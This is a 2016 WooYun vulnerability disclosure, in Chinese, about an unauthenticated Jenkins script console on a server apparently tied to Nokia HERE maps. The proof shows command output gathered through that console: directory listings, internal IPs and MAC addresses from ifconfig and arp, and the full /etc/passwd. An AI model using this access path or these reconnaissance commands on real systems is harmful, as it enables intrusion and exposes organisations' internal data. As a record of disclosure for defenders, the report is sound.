诺基亚旗下here地图国内某服务器第三方系统未授权访问(多项目源码泄露)导致命令执行

admin

140534
文章

117
评论

2017年5月1日19:30:07评论467 views字数 240阅读0分48秒阅读模式

摘要

2016-06-11：细节已通知厂商并且等待厂商处理中
2016-06-11：厂商已查看当前漏洞内容,细节仅向厂商公开
2016-06-17：厂商已经主动忽略漏洞，细节向公众公开

漏洞概要关注数(7) 关注此漏洞

缺陷编号： WooYun-2016-218182

漏洞标题：诺基亚旗下here地图国内某服务器第三方系统未授权访问(多项目源码泄露)导致命令执行

漏洞作者：路人甲

提交时间： 2016-06-11 12:08

公开时间： 2016-06-17 21:20

漏洞类型：命令执行

危害等级：高

自评Rank： 20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：远程命令执行未授权访问

0人收藏

漏洞详情

披露状态：

简要描述：

rt 上一个也是我提交的。。。

详细说明：

mask 区域

1.http://**.**.**/_
 **********
 *****授权*****

直接来命令执行 root 权限

http://*.*.*.*:8089/computer/(master)/script

ls -al /home 看见一个here用户怀疑是诺基亚的。

然后一翻代码果然是。。看下面

http://*.*.*.*:8089/job/MSP_China_Deployment_Check_F5_demo/lastSuccessfulBuild/artifact/MSP_China_Deployment_Check_F5/MSP_China_Deployment_Check_F5_Results.html

ls -al //var/lib/jenkins/jobs

code 区域

196
 drwxrwxrwx. 49 jenkins jenkins 4096 May 12 13:41 .
 drwxr-xr-x. 13 jenkins jenkins 4096 Jun  2 10:17 ..
 drwxrwxrwx.  3 root    root    4096 Nov 13 2015 MSP_China_Deployment_Check_DMRQA_hcwang
 drwxrwxrwx.  4 root    root    4096 Nov 12 2015 MSP_China_Deployment_Check_F5
 drwxrwxrwx.  4 root    root    4096 Nov 12 2015 MSP_China_Deployment_Check_F51
 drwxrwxrwx.  4 root    root    4096 Nov 12 2015 MSP_China_Deployment_Check_F5_demo
 drwxrwxrwx.  3 root    root    4096 Nov 12 2015 MSP_China_Deployment_Check_Foreign
 drwxrwxrwx.  3 root    root    4096 Nov 12 2015 MSP_China_Deployment_Check_Integration
 drwxrwxrwx.  3 root    root    4096 Nov 12 2015 MSP_China_Deployment_Check_Version
 drwxrwxrwx.  3 root    root    4096 Nov 12 2015 MSP_China_Regression
 drwxrwxrwx.  3 root    root    4096 Nov 12 2015 MSP_China_Test_Deployment_Case_Debug
 drwxrwxrwx.  3 root    root    4096 Nov 12 2015 MSP_China_Test_Deployment_Check_CD03PRD
 drwxrwxrwx.  3 root    root    4096 Nov 12 2015 MSP_China_Test_Deployment_Check_CD03QA
 drwxrwxrwx.  3 root    root    4096 Nov 12 2015 MSP_China_Test_Deployment_Check_CD03STG
 drwxrwxrwx.  3 root    root    4096 Nov 12 2015 MSP_China_Test_Deployment_Check_CD04PRD
 drwxrwxrwx.  3 root    root    4096 Nov 12 2015 MSP_China_Test_Deployment_Check_CD04QA
 drwxrwxrwx.  3 root    root    4096 Nov 12 2015 MSP_China_Test_Deployment_Check_CD04STG
 drwxrwxrwx.  3 root    root    4096 Nov 12 2015 MSP_China_Test_Deployment_Check_CD05PRD
 drwxrwxrwx.  3 root    root    4096 Nov 12 2015 MSP_China_Test_Deployment_Check_CD05QA
 drwxrwxrwx.  3 root    root    4096 Nov 12 2015 MSP_China_Test_Deployment_Check_CD05STG
 drwxrwxrwx.  3 root    root    4096 Nov 12 2015 MSP_China_Test_Deployment_Check_CD06PRD
 drwxrwxrwx.  3 root    root    4096 Nov 12 2015 MSP_China_Test_Deployment_Check_CD06QA
 drwxrwxrwx.  3 root    root    4096 Nov 12 2015 MSP_China_Test_Deployment_Check_CD06STG
 drwxrwxrwx.  3 root    root    4096 Nov 12 2015 MSP_China_Test_Deployment_Check_CD07PRD
 drwxrwxrwx.  3 root    root    4096 Nov 12 2015 MSP_China_Test_Deployment_Check_CD07QA
 drwxrwxrwx.  3 root    root    4096 Nov 13 2015 MSP_China_Test_Deployment_Check_CD07STG
 drwxrwxrwx.  3 root    root    4096 May 12 16:20 MSP_China_Test_Deployment_Check_CD08PRD
 drwxrwxrwx.  3 root    root    4096 May 19 10:11 MSP_China_Test_Deployment_Check_CD08QA
 drwxrwxrwx.  3 root    root    4096 May 12 16:19 MSP_China_Test_Deployment_Check_CD08STG
 drwxrwxrwx.  3 jenkins jenkins 4096 Jun  6 11:37 MSP_China_Test_Deployment_Check_CD09PRD
 drwxrwxrwx.  3 jenkins jenkins 4096 Jun  3 08:51 MSP_China_Test_Deployment_Check_CD09QA
 drwxrwxrwx.  3 jenkins jenkins 4096 Jun  1 10:48 MSP_China_Test_Deployment_Check_CD09STG
 drwxrwxrwx.  3 root    root    4096 Nov 12 2015 MSP_China_Test_Deployment_Check_legacy
 drwxrwxrwx.  3 root    root    4096 Nov 12 2015 MSP_China_Test_Deployment_Check_MC
 drwxrwxrwx.  3 root    root    4096 Nov 12 2015 MSP_China_Test_Deployment_Check_PRD
 drwxrwxrwx.  3 root    root    4096 Nov 12 2015 MSP_China_Test_Deployment_Check_QA
 drwxrwxrwx.  5 root    root    4096 Nov 12 2015 MSP_China_Test_Deployment_Check_STG
 drwxrwxrwx.  3 root    root    4096 Nov 12 2015 MSP_China_Test_Deployment_Check_Temp
 drwxrwxrwx.  3 root    root    4096 Jun  3 10:01 MSP_China_Test_Deployment_Check_Test
 drwxrwxrwx.  3 root    root    4096 Nov 12 2015 MSP_China_Test_Deployment_Check_Test12
 drwxrwxrwx.  3 root    root    4096 Nov 12 2015 MSP_CHINA_TEST_INTEGRATION_GeoRgeo
 drwxrwxrwx.  3 root    root    4096 Nov 12 2015 MSP_CHINA_TEST_INTEGRATION_MFS2
 drwxrwxrwx.  3 root    root    4096 Nov 12 2015 MSP_CHINA_TEST_INTEGRATION_MIA
 drwxrwxrwx.  3 root    root    4096 Nov 12 2015 MSP_TEST_REGRESSION_GEORGEO
 drwxrwxrwx.  3 root    root    4096 Nov 12 2015 THOR_China_Deployment_Check_PRD
 drwxrwxrwx.  3 root    root    4096 Nov 12 2015 THOR_China_Deployment_Check_STG
 drwxrwxrwx.  3 root    root    4096 Nov 12 2015 Thor_China_Test_Deployment_Check_dmrQA_LiRui
 drwxrwxrwx.  3 root    root    4096 Nov 12 2015 Thor_China_Test_Deployment_Check_DMR_QA_zyx
 drwxrwxrwx.  3 root    root    4096 Nov 12 2015 THOR_China_Test_Deployment_Check_SPS

ifconfig -a

code 区域

eth0      Link encap:Ethernet  HWaddr 00:22:19:33:52:08  
           inet addr:192.168.69.9  Bcast:192.168.69.255  Mask:255.255.255.0
           inet6 addr: fe80::222:19ff:fe33:5208/64 Scope:Link
           UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
           RX packets:1383001 errors:0 dropped:0 overruns:0 frame:0
           TX packets:427222150 errors:0 dropped:0 overruns:0 carrier:0
           collisions:0 txqueuelen:1000 
           RX bytes:1175852374 (1.0 GiB)  TX bytes:335780493196 (312.7 GiB)
           Interrupt:17 
 
 lo        Link encap:Local Loopback  
           inet addr:127.0.0.1  Mask:255.0.0.0
           inet6 addr: ::1/128 Scope:Host
           UP LOOPBACK RUNNING  MTU:65536  Metric:1
           RX packets:18 errors:0 dropped:0 overruns:0 frame:0
           TX packets:18 errors:0 dropped:0 overruns:0 carrier:0
           collisions:0 txqueuelen:0 
           RX bytes:940 (940.0 b)  TX bytes:940 (940.0 b)

arp -a

? (192.168.69.110) at 00:25:ab:72:b5:e9 [ether] on eth0

? (192.168.69.7) at b8:ac:6f:49:f0:eb [ether] on eth0

? (192.168.69.101) at 28:d2:44:cf:ac:bf [ether] on eth0

? (192.168.69.1) at 3c:46:d8:8e:0a:e1 [ether] on eth0

? (192.168.69.109) at e8:9a:8f:96:35:2c [ether] on eth0

? (192.168.69.105) at c4:34:6b:49:5d:7c [ether] on eth0

漏洞证明：

cat /etc/passwd

code 区域

root:x:0:0:root:/root:/bin/bash
 bin:x:1:1:bin:/bin:/sbin/nologin
 daemon:x:2:2:daemon:/sbin:/sbin/nologin
 adm:x:3:4:adm:/var/adm:/sbin/nologin
 lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
 sync:x:5:0:sync:/sbin:/bin/sync
 shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
 halt:x:7:0:halt:/sbin:/sbin/halt
 mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
 uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
 operator:x:11:0:operator:/root:/sbin/nologin
 games:x:12:100:games:/usr/games:/sbin/nologin
 gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
 ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
 nobody:x:99:99:Nobody:/:/sbin/nologin
 dbus:x:81:81:System message bus:/:/sbin/nologin
 usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin
 vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
 rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
 rtkit:x:499:496:RealtimeKit:/proc:/sbin/nologin
 nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
 avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
 abrt:x:173:173::/etc/abrt:/sbin/nologin
 rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
 nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
 saslauth:x:498:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin
 postfix:x:89:89::/var/spool/postfix:/sbin/nologin
 mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
 ntp:x:38:38::/etc/ntp:/sbin/nologin
 hsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin
 apache:x:48:48:Apache:/var/www:/sbin/nologin
 haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
 gdm:x:42:42::/var/lib/gdm:/sbin/nologin
 pulse:x:497:495:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
 sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
 nslcd:x:65:55:LDAP Client User:/:/sbin/nologin
 tcpdump:x:72:72::/:/sbin/nologin
 here:x:500:501:here:/home/here:/bin/bash
 jenkins:x:496:491:Jenkins Continuous Build server:/var/lib/jenkins:/bin/false

? (192.168.69.110) at 00:25:ab:72:b5:e9 [ether] on eth0

? (192.168.69.7) at b8:ac:6f:49:f0:eb [ether] on eth0

? (192.168.69.101) at 28:d2:44:cf:ac:bf [ether] on eth0

? (192.168.69.1) at 3c:46:d8:8e:0a:e1 [ether] on eth0

? (192.168.69.109) at e8:9a:8f:96:35:2c [ether] on eth0

? (192.168.69.105) at c4:34:6b:49:5d:7c [ether] on eth0

修复方案：

上一个也是我提交的。

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2016-06-17 21:20

厂商回复：

漏洞Rank：15 (WooYun评价)

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-06-11 14:29 | Fire ant ( 普通白帽子 | Rank:108 漏洞数:35 | 他们回来了................)

0

诺基亚不想和你说话并想你丢了一台N5630

1# 回复此人
2016-06-11 16:17 | j14n ( 普通白帽子 | Rank:2226 漏洞数:401 )

0

@Fire ant 洞主已被诺基亚砸晕。

2# 回复此人
2016-06-11 16:46 | 偶然 ( 普通白帽子 | Rank:609 漏洞数:142 | 我是天空里一片云。)

0

jenkins？

3# 回复此人

漏洞概要 关注数(7) 关注此漏洞

缺陷编号： WooYun-2016-218182

漏洞标题： 诺基亚旗下here地图国内某服务器第三方系统未授权访问(多项目源码泄露)导致命令执行

相关厂商： 诺基亚

漏洞作者： 路人甲

提交时间： 2016-06-11 12:08

公开时间： 2016-06-17 21:20

漏洞类型： 命令执行

危害等级： 高

自评Rank： 20

漏洞状态： 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 远程命令执行 未授权访问

0人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(7) 关注此漏洞

漏洞标题：诺基亚旗下here地图国内某服务器第三方系统未授权访问(多项目源码泄露)导致命令执行

相关厂商：诺基亚

漏洞作者：路人甲

漏洞类型：命令执行

危害等级：高

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签：远程命令执行未授权访问

版权声明：转载请注明来源路人甲@乌云

漏洞评价(共0人评价):

登陆后才能进行评分